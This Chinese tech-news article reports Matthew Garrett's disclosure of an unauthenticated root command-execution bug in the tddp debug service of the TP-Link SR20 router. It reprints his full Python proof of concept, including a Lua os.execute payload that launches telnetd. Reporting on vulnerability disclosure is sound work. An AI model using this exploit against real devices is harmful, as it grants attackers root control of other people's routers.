TP-Link 不回应,安全工程师公开了其路由器漏洞
此前 Google 安全工程师在 TP-Link 的 SR20 智能家居路由器上发现了一个允许从本地网络连接执行任意命令的漏洞,他将问题报告给 TP-Link,但是经过了 90 天还没有得到官方的回应,于是他公开了该漏洞。
该问题由著名的 Google 安全工程师与开源贡献者 Matthew Garrett 披露,周三他公开的 38 行概念验证代码显示出在利用 SR20 的漏洞时可以使用 root 权限执行设备上的任何命令,并且无需身份验证。
Matthew 解释,TP-Link 路由器经常以 root 身份运行名为“tddp”(TP-Link Device Debug Protocol,TP-Link设备调试协议)的进程。它已经存在了多个漏洞,其中一个没有身份验证。
“SR20 暴露了一些第一个版本协议的命令,其中一个(命令 0x1f,请求 0x01)似乎是用于某种配置验证”,他说:“你发送文件和相应参数,收到命令后,路由器通过 TFTP 响应请求的机器,询问文件名,将其导入 Lua 解释器,以 root 身份运行,并将参数发送到导入文件中的 config_test() 函数。Lua os.execute() 方法传递一个由操作系统 shell 执行的命令。”
由于解释器以 root 身份运行,所以可以执行任意命令。
#!/usr/bin/python3 # Create /testfile in your tftp root directory with the following contents: # #function config_test(config) # os.execute("telnetd -l /bin/login.sh") #end # # Replace 192.168.0.1 with the IP address of the vulnerable device import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) packet = packet + b"/testfile;arbitrary" print(packet) sock_send.sendto(packet, ("192.168.0.1", port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
Debian 获 Handshake 30 万美元捐赠,用于改进基础设施
2019年3月29日,Debian 在官网发布公告表示,已收到来自 Handshake 的 30 万美元捐赠。Handshake 是一家开发实验性点对点根域名系统的组织,此前也它向自由软件基金会(FSF)捐赠了 100 万美元。 按照 Debian 的说法,他们会将这笔捐赠用于继续执行 Debian 的硬件更换计划,包括更新服务器和其他硬件组件。通过这一系列的更新使得项目的开发和社区基础设施更稳定可靠。 Handshake 是一种与 DNS 兼容的分布式、无需许可(permissionless naming protocol)的命名协议,其中每个对等方都在验证并负责管理根区域,目的是创建现有证书颁发机构的替代方案。 Handshake 项目其赞助商和贡献者认为自由和开源软件是互联网及其项目基础的重要组成部分,因此他们决定通过向各种 FLOSS 开发者和项目进行捐赠,目前向各种开源项目、基金会、组织和高校已捐赠超过 1020 万美元。
- 下一篇
微软已正式废止 WoSign / StartCom 品牌根证书
2019年3月5日,微软发布最新一期 Microsoft Trusted Root Certificate Program,宣布正式废止 2 张 StartCom 品牌和 4 张 WoSign 品牌根证书,距微软宣布“在 Windows 10 中移除沃通和 StartCom 两大证书签发机构”已过去18个月。 至此,曾受信于微软的 2 张 StartCom、5 张 WoSign 根证书已全体废止(WoSign 旗下另一根证书 WoSign 1999 早已废止)。 其他说明: 微软宣布废止 WoSign 品牌根证书,和该根证书被吊销略有差异,2019年3月前已用该根证书签发的终端用户代码签名证书签名且加签时间戳的,数字签名仍有效; 沃通旗下经由 Certum / DigiCert 等 CA 机构签发的 WoSign、WoTrus 证书不受本次更新影响。 来自:cnBeta
相关文章
文章评论
共有0条评论来说两句吧...